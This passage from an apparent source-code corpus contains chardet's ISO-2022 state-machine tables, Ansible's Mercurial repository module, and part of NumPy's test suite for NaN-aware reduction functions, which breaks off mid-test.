'name': "ISO-2022-CN"}
ISO2022JP_cls = (
2,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,2,2, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,7,0,0,0, # 20 - 27
3,0,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
6,0,4,0,8,0,0,0, # 40 - 47
0,9,5,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
2,2,2,2,2,2,2,2, # 80 - 87
2,2,2,2,2,2,2,2, # 88 - 8f
2,2,2,2,2,2,2,2, # 90 - 97
2,2,2,2,2,2,2,2, # 98 - 9f
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,2, # f8 - ff
)
ISO2022JP_st = (
eStart, 3,eError,eStart,eStart,eStart,eStart,eStart,# 00-07
eStart,eStart,eError,eError,eError,eError,eError,eError,# 08-0f
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 10-17
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,# 18-1f
eError, 5,eError,eError,eError, 4,eError,eError,# 20-27
eError,eError,eError, 6,eItsMe,eError,eItsMe,eError,# 28-2f
eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,# 30-37
eError,eError,eError,eItsMe,eError,eError,eError,eError,# 38-3f
eError,eError,eError,eError,eItsMe,eError,eStart,eStart,# 40-47
)
ISO2022JPCharLenTable = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
ISO2022JPSMModel = {'classTable': ISO2022JP_cls,
'classFactor': 10,
'stateTable': ISO2022JP_st,
'charLenTable': ISO2022JPCharLenTable,
'name': "ISO-2022-JP"}
ISO2022KR_cls = (
2,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,3,0,0,0, # 20 - 27
0,4,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,5,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
2,2,2,2,2,2,2,2, # 80 - 87
2,2,2,2,2,2,2,2, # 88 - 8f
2,2,2,2,2,2,2,2, # 90 - 97
2,2,2,2,2,2,2,2, # 98 - 9f
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,2, # f8 - ff
)
ISO2022KR_st = (
eStart, 3,eError,eStart,eStart,eStart,eError,eError,# 00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 08-0f
eItsMe,eItsMe,eError,eError,eError, 4,eError,eError,# 10-17
eError,eError,eError,eError, 5,eError,eError,eError,# 18-1f
eError,eError,eError,eItsMe,eStart,eStart,eStart,eStart,# 20-27
)
ISO2022KRCharLenTable = (0, 0, 0, 0, 0, 0)
ISO2022KRSMModel = {'classTable': ISO2022KR_cls,
'classFactor': 6,
'stateTable': ISO2022KR_st,
'charLenTable': ISO2022KRCharLenTable,
'name': "ISO-2022-KR"}
# flake8: noqa
| gpl-3.0 |
majidaldo/ansible-modules-core | source_control/hg.py | 108 | 9125 | #!/usr/bin/python
#-*- coding: utf-8 -*-
# (c) 2013, Yeukhon Wong <yeukhon@acm.org>
# (c) 2014, Nate Coraor <nate@bx.psu.edu>
#
# This module was originally inspired by Brad Olson's ansible-module-mercurial
# <https://github.com/bradobro/ansible-module-mercurial>. This module tends
# to follow the git module implementation.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
import ConfigParser
DOCUMENTATION = '''
---
module: hg
short_description: Manages Mercurial (hg) repositories.
description:
- Manages Mercurial (hg) repositories. Supports SSH, HTTP/S and local address.
version_added: "1.0"
author: "Yeukhon Wong (@yeukhon)"
options:
repo:
description:
- The repository address.
required: true
default: null
aliases: [ name ]
dest:
description:
- Absolute path of where the repository should be cloned to.
required: true
default: null
revision:
description:
- Equivalent C(-r) option in hg command which could be the changeset, revision number,
branch name or even tag.
required: false
default: null
aliases: [ version ]
force:
description:
- Discards uncommitted changes. Runs C(hg update -C). Prior to
1.9, the default was `yes`.
required: false
default: "no"
choices: [ "yes", "no" ]
purge:
description:
- Deletes untracked files. Runs C(hg purge).
required: false
default: "no"
choices: [ "yes", "no" ]
update:
required: false
default: "yes"
choices: [ "yes", "no" ]
version_added: "2.0"
description:
- If C(no), do not retrieve new revisions from the origin repository
executable:
required: false
default: null
version_added: "1.4"
description:
- Path to hg executable to use. If not supplied,
the normal mechanism for resolving binary paths will be used.
notes:
- "If the task seems to be hanging, first verify remote host is in C(known_hosts).
SSH will prompt user to authorize the first contact with a remote host. To avoid this prompt,
one solution is to add the remote host public key in C(/etc/ssh/ssh_known_hosts) before calling
the hg module, with the following command: ssh-keyscan remote_host.com >> /etc/ssh/ssh_known_hosts."
requirements: [ ]
'''
EXAMPLES = '''
# Ensure the current working copy is inside the stable branch and deletes untracked files if any.
- hg: repo=https://bitbucket.org/user/repo1 dest=/home/user/repo1 revision=stable purge=yes
'''
class Hg(object):
def __init__(self, module, dest, repo, revision, hg_path):
self.module = module
self.dest = dest
self.repo = repo
self.revision = revision
self.hg_path = hg_path
def _command(self, args_list):
(rc, out, err) = self.module.run_command([self.hg_path] + args_list)
return (rc, out, err)
def _list_untracked(self):
args = ['purge', '--config', 'extensions.purge=', '-R', self.dest, '--print']
return self._command(args)
def get_revision(self):
"""
hg id -b -i -t returns a string in the format:
"<changeset>[+] <branch_name> <tag>"
This format lists the state of the current working copy,
and indicates whether there are uncommitted changes by the
plus sign. Otherwise, the sign is omitted.
Read the full description via hg id --help
"""
(rc, out, err) = self._command(['id', '-b', '-i', '-t', '-R', self.dest])
if rc != 0:
self.module.fail_json(msg=err)
else:
return out.strip('\n')
def has_local_mods(self):
now = self.get_revision()
if '+' in now:
return True
else:
return False
def discard(self):
before = self.has_local_mods()
if not before:
return False
args = ['update', '-C', '-R', self.dest]
if self.revision is not None:
args = args + ['-r', self.revision]
(rc, out, err) = self._command(args)
if rc != 0:
self.module.fail_json(msg=err)
after = self.has_local_mods()
if before != after and not after: # no more local modification
return True
def purge(self):
# before purge, find out if there are any untracked files
(rc1, out1, err1) = self._list_untracked()
if rc1 != 0:
self.module.fail_json(msg=err1)
# there are some untrackd files
if out1 != '':
args = ['purge', '--config', 'extensions.purge=', '-R', self.dest]
(rc2, out2, err2) = self._command(args)
if rc2 != 0:
self.module.fail_json(msg=err2)
return True
else:
return False
def cleanup(self, force, purge):
discarded = False
purged = False
if force:
discarded = self.discard()
if purge:
purged = self.purge()
if discarded or purged:
return True
else:
return False
def pull(self):
return self._command(
['pull', '-R', self.dest, self.repo])
def update(self):
if self.revision is not None:
return self._command(['update', '-r', self.revision, '-R', self.dest])
return self._command(['update', '-R', self.dest])
def clone(self):
if self.revision is not None:
return self._command(['clone', self.repo, self.dest, '-r', self.revision])
return self._command(['clone', self.repo, self.dest])
@property
def at_revision(self):
"""
There is no point in pulling from a potentially down/slow remote site
if the desired changeset is already the current changeset.
"""
if self.revision is None or len(self.revision) < 7:
# Assume it's a rev number, tag, or branch
return False
(rc, out, err) = self._command(['--debug', 'id', '-i', '-R', self.dest])
if rc != 0:
self.module.fail_json(msg=err)
if out.startswith(self.revision):
return True
return False
# ===========================================
def main():
module = AnsibleModule(
argument_spec = dict(
repo = dict(required=True, aliases=['name']),
dest = dict(required=True),
revision = dict(default=None, aliases=['version']),
force = dict(default='no', type='bool'),
purge = dict(default='no', type='bool'),
update = dict(default='yes', type='bool'),
executable = dict(default=None),
),
)
repo = module.params['repo']
dest = os.path.expanduser(module.params['dest'])
revision = module.params['revision']
force = module.params['force']
purge = module.params['purge']
update = module.params['update']
hg_path = module.params['executable'] or module.get_bin_path('hg', True)
hgrc = os.path.join(dest, '.hg/hgrc')
# initial states
before = ''
changed = False
cleaned = False
hg = Hg(module, dest, repo, revision, hg_path)
# If there is no hgrc file, then assume repo is absent
# and perform clone. Otherwise, perform pull and update.
if not os.path.exists(hgrc):
(rc, out, err) = hg.clone()
if rc != 0:
module.fail_json(msg=err)
elif not update:
# Just return having found a repo already in the dest path
before = hg.get_revision()
elif hg.at_revision:
# no update needed, don't pull
before = hg.get_revision()
# but force and purge if desired
cleaned = hg.cleanup(force, purge)
else:
# get the current state before doing pulling
before = hg.get_revision()
# can perform force and purge
cleaned = hg.cleanup(force, purge)
(rc, out, err) = hg.pull()
if rc != 0:
module.fail_json(msg=err)
(rc, out, err) = hg.update()
if rc != 0:
module.fail_json(msg=err)
after = hg.get_revision()
if before != after or cleaned:
changed = True
module.exit_json(before=before, after=after, changed=changed, cleaned=cleaned)
# import module snippets
from ansible.module_utils.basic import *
main()
| gpl-3.0 |
pyparallel/numpy | numpy/lib/tests/test_nanfunctions.py | 85 | 26868 | from __future__ import division, absolute_import, print_function
import warnings
import numpy as np
from numpy.testing import (
run_module_suite, TestCase, assert_, assert_equal, assert_almost_equal,
assert_raises, assert_array_equal
)
# Test data
_ndat = np.array([[0.6244, np.nan, 0.2692, 0.0116, np.nan, 0.1170],
[0.5351, -0.9403, np.nan, 0.2100, 0.4759, 0.2833],
[np.nan, np.nan, np.nan, 0.1042, np.nan, -0.5954],
[0.1610, np.nan, np.nan, 0.1859, 0.3146, np.nan]])
# Rows of _ndat with nans removed
_rdat = [np.array([0.6244, 0.2692, 0.0116, 0.1170]),
np.array([0.5351, -0.9403, 0.2100, 0.4759, 0.2833]),
np.array([0.1042, -0.5954]),
np.array([0.1610, 0.1859, 0.3146])]
class TestNanFunctions_MinMax(TestCase):
nanfuncs = [np.nanmin, np.nanmax]
stdfuncs = [np.min, np.max]
def test_mutation(self):
# Check that passed array is not modified.
ndat = _ndat.copy()
for f in self.nanfuncs:
f(ndat)
assert_equal(ndat, _ndat)
def test_keepdims(self):
mat = np.eye(3)
for nf, rf in zip(self.nanfuncs, self.stdfuncs):
for axis in [None, 0, 1]:
tgt = rf(mat, axis=axis, keepdims=True)
res = nf(mat, axis=axis, keepdims=True)
assert_(res.ndim == tgt.ndim)
def test_out(self):
mat = np.eye(3)
for nf, rf in zip(self.nanfuncs, self.stdfuncs):
resout = np.zeros(3)
tgt = rf(mat, axis=1)
res = nf(mat, axis=1, out=resout)
assert_almost_equal(res, resout)
assert_almost_equal(res, tgt)
def test_dtype_from_input(self):
codes = 'efdgFDG'
for nf, rf in zip(self.nanfuncs, self.stdfuncs):
for c in codes:
mat = np.eye(3, dtype=c)
tgt = rf(mat, axis=1).dtype.type
res = nf(mat, axis=1).dtype.type
assert_(res is tgt)
# scalar case
tgt = rf(mat, axis=None).dtype.type
res = nf(mat, axis=None).dtype.type
assert_(res is tgt)
def test_result_values(self):
for nf, rf in zip(self.nanfuncs, self.stdfuncs):
tgt = [rf(d) for d in _rdat]
res = nf(_ndat, axis=1)
assert_almost_equal(res, tgt)
def test_allnans(self):
mat = np.array([np.nan]*9).reshape(3, 3)
for f in self.nanfuncs:
for axis in [None, 0, 1]:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
assert_(np.isnan(f(mat, axis=axis)).all())
assert_(len(w) == 1, 'no warning raised')
assert_(issubclass(w[0].category, RuntimeWarning))
# Check scalars
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
assert_(np.isnan(f(np.nan)))
assert_(len(w) == 1, 'no warning raised')
assert_(issubclass(w[0].category, RuntimeWarning))
def test_masked(self):
mat = np.ma.fix_invalid(_ndat)
msk = mat._mask.copy()
for f in [np.nanmin]:
res = f(mat, axis=1)
tgt = f(_ndat, axis=1)
assert_equal(res, tgt)
assert_equal(mat._mask, msk)
assert_(not np.isinf(mat).any())
def test_scalar(self):
for f in self.nanfuncs:
assert_(f(0.) == 0.)
def test_matrices(self):
# Check that it works and that type and
# shape are preserved
mat = np.matrix(np.eye(3))
for f in self.nanfuncs:
res = f(mat, axis=0)
assert_(isinstance(res, np.matrix))
assert_(res.shape == (1, 3))
res = f(mat, axis=1)
assert_(isinstance(res, np.matrix))
assert_(res.shape == (3, 1))
res = f(mat)
assert_(np.isscalar(res))
# check that rows of nan are dealt with for subclasses (#4628)
mat[1] = np.nan
for f in self.nanfuncs:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
res = f(mat, axis=0)
assert_(isinstance(res, np.matrix))
assert_(not np.any(np.isnan(res)))
assert_(len(w) == 0)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
res = f(mat, axis=1)
assert_(isinstance(res, np.matrix))
assert_(np.isnan(res[1, 0]) and not np.isnan(res[0, 0])
and not np.isnan(res[2, 0]))
assert_(len(w) == 1, 'no warning raised')
assert_(issubclass(w[0].category, RuntimeWarning))
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
res = f(mat)
assert_(np.isscalar(res))
assert_(res != np.nan)
assert_(len(w) == 0)
class TestNanFunctions_ArgminArgmax(TestCase):
nanfuncs = [np.nanargmin, np.nanargmax]
def test_mutation(self):
# Check that passed array is not modified.
ndat = _ndat.copy()
for f in self.nanfuncs:
f(ndat)
assert_equal(ndat, _ndat)
def test_result_values(self):
for f, fcmp in zip(self.nanfuncs, [np.greater, np.less]):
for row in _ndat:
with warnings.catch_warnings(record=True):
warnings.simplefilter('always')
ind = f(row)
val = row[ind]
# comparing with NaN is tricky as the result
# is always false except for NaN != NaN
assert_(not np.isnan(val))
assert_(not fcmp(val, row).any())
assert_(not np.equal(val, row[:ind]).any())
def test_allnans(self):
mat = np.array([np.nan]*9).reshape(3, 3)
for f in self.nanfuncs:
for axis in [None, 0, 1]:
assert_raises(ValueError, f, mat, axis=axis)
assert_raises(ValueError, f, np.nan)
def test_empty(self):
mat = np.zeros((0, 3))
for f in self.nanfuncs:
for axis in [0, None]:
assert_raises(ValueError, f, mat, axis=axis)
for axis in [1]:
res = f(mat, axis=axis)
assert_equal(res, np.zeros(0))
def test_scalar(self):
for f in self.nanfuncs:
assert_(f(0.) == 0.)
def test_matrices(self):
# Check that it works and that type and
# shape are preserved
mat = np.matrix(np.eye(3))
for f in self.nanfuncs:
res = f(mat, axis=0)
assert_(isinstance(res, np.matrix))
assert_(res.shape == (1, 3))
res = f(mat, axis=1)
assert_(isinstance(res, np.matrix))
assert_(res.shape == (3, 1))
res = f(mat)
assert_(np.isscalar(res))
class TestNanFunctions_IntTypes(TestCase):
int_types = (np.int8, np.int16, np.int32, np.int64, np.uint8,
np.uint16, np.uint32, np.uint64)
mat = np.array([127, 39, 93, 87, 46])
def integer_arrays(self):
for dtype in self.int_types:
yield self.mat.astype(dtype)
def test_nanmin(self):
tgt = np.min(self.mat)
for mat in self.integer_arrays():
assert_equal(np.nanmin(mat), tgt)
def test_nanmax(self):
tgt = np.max(self.mat)
for mat in self.integer_arrays():
assert_equal(np.nanmax(mat), tgt)
def test_nanargmin(self):
tgt = np.argmin(self.mat)
for mat in self.integer_arrays():
assert_equal(np.nanargmin(mat), tgt)
def test_nanargmax(self):
tgt = np.argmax(self.mat)
for mat in self.integer_arrays():
assert_equal(np.nanargmax(mat), tgt)
def test_nansum(self):
tgt = np.sum(self.mat)
for mat in self.integer_arrays():
assert_equal(np.nansum(mat), tgt)
def test_nanprod(self):
tgt = np.prod(self.mat)
for mat in self.integer_arrays():
assert_equal(np.nanprod(mat), tgt)
def test_nanmean(self):
tgt = np.mean(self.mat)
for mat in self.integer_arrays():
assert_equal(np.nanmean(mat), tgt)
def test_nanvar(self):
tgt = np.var(self.mat)
for mat in self.integer_arrays():
assert_equal(np.nanvar(mat), tgt)
tgt = np.var(mat, ddof=1)
for mat in self.integer_arrays():
assert_equal(np.nanvar(mat, ddof=1), tgt)
def test_nanstd(self):
tgt = np.std(self.mat)
for mat in self.integer_arrays():
assert_equal(np.nanstd(mat), tgt)
tgt = np.std(self.mat, ddof=1)
for mat in self.integer_arrays():
assert_equal(np.nanstd(mat, ddof=1), tgt)
class SharedNanFunctionsTestsMixin(object):
def test_mutation(self):
# Check that passed array is not modified.
ndat = _ndat.copy()
for f in self.nanfuncs:
f(ndat)
assert_equal(ndat, _ndat)
def test_keepdims(self):
mat = np.eye(3)
for nf, rf in zip(self.nanfuncs, self.stdfuncs):
for axis in [None, 0, 1]:
tgt = rf(mat, axis=axis, keepdims=True)
res = nf(mat, axis=axis, keepdims=True)
assert_(res.ndim == tgt.ndim)
def test_out(self):
mat = np.eye(3)
for nf, rf in zip(self.nanfuncs, self.stdfuncs):
resout = np.zeros(3)
tgt = rf(mat, axis=1)
res = nf(mat, axis=1, out=resout)
assert_almost_equal(res, resout)
assert_almost_equal(res, tgt)
def test_dtype_from_dtype(self):
mat = np.eye(3)
codes = 'efdgFDG'
for nf, rf in zip(self.nanfuncs, self.stdfuncs):
for c in codes:
tgt = rf(mat, dtype=np.dtype(c), axis=1).dtype.type
res = nf(mat, dtype=np.dtype(c), axis=1).dtype.type
assert_(res is tgt)
# scalar case
tgt = rf(mat, dtype=np.dtype(c), axis=None).dtype.type
res = nf(mat, dtype=np.dtype(c), axis=None).dtype.type
assert_(res is tgt)
def test_dtype_from_char(self):
mat = np.eye(3)
codes = 'efdgFDG'
for nf, rf in zip(self.nanfuncs, self.stdfuncs):
for c in codes:
tgt = rf(mat, dtype=c, axis=1).dtype.type
res = nf(mat, dtype=c, axis=1).dtype.type
assert_(res is tgt)
# scalar case
tgt = rf(mat, dtype=c, axis=None).dtype.type
res = nf(mat, dtype=c, axis=None).dtype.type
assert_(res is tgt)
def test_dtype_from_input(self):
codes = 'efdgFDG'
for nf, rf in zip(self.nanfuncs, self.stdfuncs):
for c in codes:
mat = np.eye(3, dtype=c)
tgt = rf(mat, axis=1).dtype.type
res = nf(mat, axis=1).dtype.type
assert_(res is tgt, "res %s, tgt %s" % (res, tgt))
# scalar case
tgt = rf(mat, axis=None).dtype.type
res = nf(mat, axis=None).dtype.type
assert_(res is tgt)
def test_result_values(self):
for nf, rf in zip(self.nanfuncs, self.stdfuncs):
tgt = [rf(d) for d in _rdat]
res = nf(_ndat, axis=1)
assert_almost_equal(res, tgt)
def test_scalar(self):
for f in self.nanfuncs:
assert_(f(0.) == 0.)
def test_matrices(self):
# Check that it works and that type and
# shape are preserved
mat = np.matrix(np.eye(3))
for f in self.nanfuncs:
res = f(mat, axis=0)
assert_(isinstance(res, np.matrix))
assert_(res.shape == (1, 3))
res = f(mat, axis=1)
assert_(isinstance(res, np.matrix))
assert_(res.shape == (3, 1))
res = f(mat)
assert_(np.isscalar(res))
class TestNanFunctions_SumProd(TestCase, SharedNanFunctionsTestsMixin):
nanfuncs = [np.nansum, np.nanprod]
stdfuncs = [np.sum, np.prod]
def test_allnans(self):
# Check for FutureWarning
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
res = np.nansum([np.nan]*3, axis=None)
assert_(res == 0, 'result is not 0')
assert_(len(w) == 0, 'warning raised')
# Check scalar
res = np.nansum(np.nan)
assert_(res == 0, 'result is not 0')
assert_(len(w) == 0, 'warning raised')
# Check there is no warning for not all-nan
np.nansum([0]*3, axis=None)
assert_(len(w) == 0, 'unwanted warning raised')
def test_empty(self):
for f, tgt_value in zip([np.nansum, np.nanprod], [0, 1]):
mat = np.zeros((0, 3))
tgt = [tgt_value]*3
res = f(mat, axis=0)
assert_equal(res, tgt)
tgt = []
res = f(mat, axis=1)
assert_equal(res, tgt)
tgt = tgt_value
res = f(mat, axis=None)
assert_equal(res, tgt)
class TestNanFunctions_MeanVarStd(TestCase, SharedNanFunctionsTestsMixin):
nanfuncs = [np.nanmean, np.nanvar, np.nanstd]
stdfuncs = [np.mean, np.var, np.std]
def test_dtype_error(self):
for f in self.nanfuncs:
for dtype in [np.bool_, np.int_, np.object]:
assert_raises(TypeError, f, _ndat, axis=1, dtype=np.int)
def test_out_dtype_error(self):
for f in self.nanfuncs:
for dtype in [np.bool_, np.int_, np.object]:
out = np.empty(_ndat.shape[0], dtype=dtype)
assert_raises(TypeError, f, _ndat, axis=1, out=out)
def test_ddof(self):
nanfuncs = [np.nanvar, np.nanstd]
stdfuncs = [np.var, np.std]
for nf, rf in zip(nanfuncs, stdfuncs):
for ddof in [0, 1]:
tgt = [rf(d, ddof=ddof) for d in _rdat]
res = nf(_ndat, axis=1, ddof=ddof)
assert_almost_equal(res, tgt)
def test_ddof_too_big(self):
nanfuncs = [np.nanvar, np.nanstd]
stdfuncs = [np.var, np.std]
dsize = [len(d) for d in _rdat]
for nf, rf in zip(nanfuncs, stdfuncs):
for ddof in range(5):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
tgt = [ddof >= d for d in dsize]
res = nf(_ndat, axis=1, ddof=ddof)
assert_equal(np.isnan(res), tgt)
if any(tgt):
assert_(len(w) == 1)
assert_(issubclass(w[0].category, RuntimeWarning))
else:
assert_(len(w) == 0)
def test_allnans(self):
mat = np.array([np.nan]*9).reshape(3, 3)
for f in self.nanfuncs:
for axis in [None, 0, 1]:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
assert_(np.isnan(f(mat, axis=axis)).all())
assert_(len(w) == 1)
assert_(issubclass(w[0].category, RuntimeWarning))
# Check scalar
assert_(np.isnan(f(np.nan)))
assert_(len(w) == 2)
assert_(issubclass(w[0].category, RuntimeWarning))
def test_empty(self):
mat = np.zeros((0, 3))
for f in self.nanfuncs:
for axis in [0, None]:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
assert_(np.isnan(f(mat, axis=axis)).all())
assert_(len(w) == 1)
assert_(issubclass(w[0].category, RuntimeWarning))
for axis in [1]:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
assert_equal(f(mat, axis=axis), np.zeros([]))
assert_(len(w) == 0)
class TestNanFunctions_Median(TestCase):
def test_mutation(self):
# Check that passed array is not modified.
ndat = _ndat.copy()
np.nanmedian(ndat)
assert_equal(ndat, _ndat)
def test_keepdims(self):
mat = np.eye(3)
for axis in [None, 0, 1]:
tgt = np.median(mat, axis=axis, out=None, overwrite_input=False)
res = np.nanmedian(mat, axis=axis, out=None, overwrite_input=False)
assert_(res.ndim == tgt.ndim)
d = np.ones((3, 5, 7, 11))
# Randomly set some elements to NaN:
w = np.random.random((4, 200)) * np.array(d.shape)[:, None]
w = w.astype(np.intp)
d[tuple(w)] = np.nan
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', RuntimeWarning)
res = np.nanmedian(d, axis=None, keepdims=True)
assert_equal(res.shape, (1, 1, 1, 1))
res = np.nanmedian(d, axis=(0, 1), keepdims=True)
assert_equal(res.shape, (1, 1, 7, 11))
res = np.nanmedian(d, axis=(0, 3), keepdims=True)
assert_equal(res.shape, (1, 5, 7, 1))
res = np.nanmedian(d, axis=(1,), keepdims=True)
assert_equal(res.shape, (3, 1, 7, 11))
res = np.nanmedian(d, axis=(0, 1, 2, 3), keepdims=True)
assert_equal(res.shape, (1, 1, 1, 1))
res = np.nanmedian(d, axis=(0, 1, 3), keepdims=True)
assert_equal(res.shape, (1, 1, 7, 1))
def test_out(self):
mat = np.random.rand(3, 3)
nan_mat = np.insert(mat, [0, 2], np.nan, axis=1)
resout = np.zeros(3)
tgt = np.median(mat, axis=1)
res = np.nanmedian(nan_mat, axis=1, out=resout)
assert_almost_equal(res, resout)
assert_almost_equal(res, tgt)
# 0-d output:
resout = np.zeros(())
tgt = np.median(mat, axis=None)
res = np.nanmedian(nan_mat, axis=None, out=resout)
assert_almost_equal(res, resout)
assert_almost_equal(res, tgt)
res = np.nanmedian(nan_mat, axis=(0, 1), out=resout)
assert_almost_equal(res, resout)
assert_almost_equal(res, tgt)
def test_small_large(self):
# test the small and large code paths, current cutoff 400 elements
for s in [5, 20, 51, 200, 1000]:
d = np.random.randn(4, s)
# Randomly set some elements to NaN:
w = np.random.randint(0, d.size, size=d.size // 5)
d.ravel()[w] = np.nan
d[:,0] = 1. # ensure at least one good value
# use normal median without nans to compare
tgt = []
for x in d:
nonan = np.compress(~np.isnan(x), x)
tgt.append(np.median(nonan, overwrite_input=True))
assert_array_equal(np.nanmedian(d, axis=-1), tgt)
def test_result_values(self):
tgt = [np.median(d) for d in _rdat]
res = np.nanmedian(_ndat, axis=1)
assert_almost_equal(res, tgt)
def test_allnans(self):
mat = np.array([np.nan]*9).reshape(3, 3)
for axis in [None, 0, 1]:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
assert_(np.isnan(np.nanmedian(mat, axis=axis)).all())
if axis is None:
assert_(len(w) == 1)
else:
assert_(len(w) == 3)
assert_(issubclass(w[0].category, RuntimeWarning))
# Check scalar
assert_(np.isnan(np.nanmedian(np.nan)))
if axis is None:
assert_(len(w) == 2)
else:
assert_(len(w) == 4)
assert_(issubclass(w[0].category, RuntimeWarning))
def test_empty(self):
mat = np.zeros((0, 3))
for axis in [0, None]:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
assert_(np.isnan(np.nanmedian(mat, axis=axis)).all())
assert_(len(w) == 1)
assert_(issubclass(w[0].category, RuntimeWarning))
for axis in [1]:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
assert_equal(np.nanmedian(mat, axis=axis), np.zeros([]))
assert_(len(w) == 0)
def test_scalar(self):
assert_(np.nanmedian(0.) == 0.)
def test_extended_axis_invalid(self):
d = np.ones((3, 5, 7, 11))
assert_raises(IndexError, np.nanmedian, d, axis=-5)
assert_raises(IndexError, np.nanmedian, d, axis=(0, -5))
assert_raises(IndexError, np.nanmedian, d, axis=4)
assert_raises(IndexError, np.nanmedian, d, axis=(0, 4))
assert_raises(ValueError, np.nanmedian, d, axis=(1, 1))
def test_float_special(self):
with warnings.catch_warnings(record=True):
warnings.simplefilter('ignore', RuntimeWarning)
a = np.array([[np.inf, np.nan], [np.nan, np.nan]])
assert_equal(np.nanmedian(a, axis=0), [np.inf, np.nan])
assert_equal(np.nanmedian(a, axis=1), [np.inf, np.nan])
assert_equal(np.nanmedian(a), np.inf)
# minimum fill value check
a = np.array([[np.nan, np.nan, np.inf], [np.nan, np.nan, np.inf]])
assert_equal(np.nanmedian(a, axis=1), np.inf)
# no mask path
a = np.array([[np.inf, np.inf], [np.inf, np.inf]])
assert_equal(np.nanmedian(a, axis=1), np.inf)
class TestNanFunctions_Percentile(TestCase):
def test_mutation(self):
# Check that passed array is not modified.
ndat = _ndat.copy()
np.nanpercentile(ndat, 30)
assert_equal(ndat, _ndat)
def test_keepdims(self):
mat = np.eye(3)
for axis in [None, 0, 1]:
tgt = np.percentile(mat, 70, axis=axis, out=None,
overwrite_input=False)
res = np.nanpercentile(mat, 70, axis=axis, out=None,
overwrite_input=False)
assert_(res.ndim == tgt.ndim)
d = np.ones((3, 5, 7, 11))
# Randomly set some elements to NaN:
w = np.random.random((4, 200)) * np.array(d.shape)[:, None]
w = w.astype(np.intp)
d[tuple(w)] = np.nan
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', RuntimeWarning)
res = np.nanpercentile(d, 90, axis=None, keepdims=True)
assert_equal(res.shape, (1, 1, 1, 1))
res = np.nanpercentile(d, 90, axis=(0, 1), keepdims=True)
assert_equal(res.shape, (1, 1, 7, 11))
res = np.nanpercentile(d, 90, axis=(0, 3), keepdims=True)
assert_equal(res.shape, (1, 5, 7, 1))
res = np.nanpercentile(d, 90, axis=(1,), keepdims=True)
assert_equal(res.shape, (3, 1, 7, 11))
res = np.nanpercentile(d, 90, axis=(0, 1, 2, 3), keepdims=True)
assert_equal(res.shape, (1, 1, 1, 1))
res = np.nanpercentile(d, 90, axis=(0, 1, 3), keepdims=True)
assert_equal(res.shape, (1, 1, 7, 1))
def test_out(self):
mat = np.random.rand(3, 3)
